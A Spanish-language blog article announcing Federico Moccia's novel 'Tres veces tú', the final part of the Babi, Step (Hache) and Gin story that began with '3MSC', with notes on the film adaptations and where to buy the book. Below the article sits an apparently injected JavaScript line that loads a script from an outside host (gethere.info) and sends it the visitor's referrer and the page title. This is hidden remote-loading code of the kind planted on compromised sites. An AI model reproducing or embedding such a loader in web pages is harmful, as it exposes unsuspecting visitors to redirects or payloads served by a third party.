‘Tres veces tú’; llega la tercera parte de 3MSC

Federico Moccia ha lanzado una nueva novela que llega para poner punto y final a la historia de amor entre Babi y Step (Hache)

Seguramente te identificas más con la película española que con los libros. Si lo tuyo es el filme protagonizada por Mario Casas y Maria Valberde, recordarás su historia de amor en la primera parte “3MSC” (2010) y una segunda con “Tengo ganas de ti” (2012).

Pero si pensabas que todo terminaba aquí, Federico Moccia, autor de esta historia de amor, decidió sacar una tercera parte y poder saber al fin, que pasa entre Gin, Step (Hache) y Babi.

El día de ayer salió a la venta el libro que pondrá fin a esta historia que lleva por titulo “Tres veces tú”, en donde los personajes de la historia han crecido y evolucionado.

portada-tres-veces-tu

Step también conocido como Hache, ya no es un loco de las carrera ilegales, Babi no es una adolescente enamorada y Gin (aquella a la que conocimos en Tengo ganas de ti) ya no es una rebelde peleada con el mundo.

En la novela, todos se enfrentan a otro tipo de problemas y situaciones mucho más serias que a una simple pelea callejera, como cuando era adolescentes.

Se desconoce si esta tercera parte de la historia, será llevada a la pantalla grande para quienes no lean el libro, sepan el final de este trio amoroso.

El libro lo puedes descargar a través de iBooks o Google Play, por un costo de 169 pesos.

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado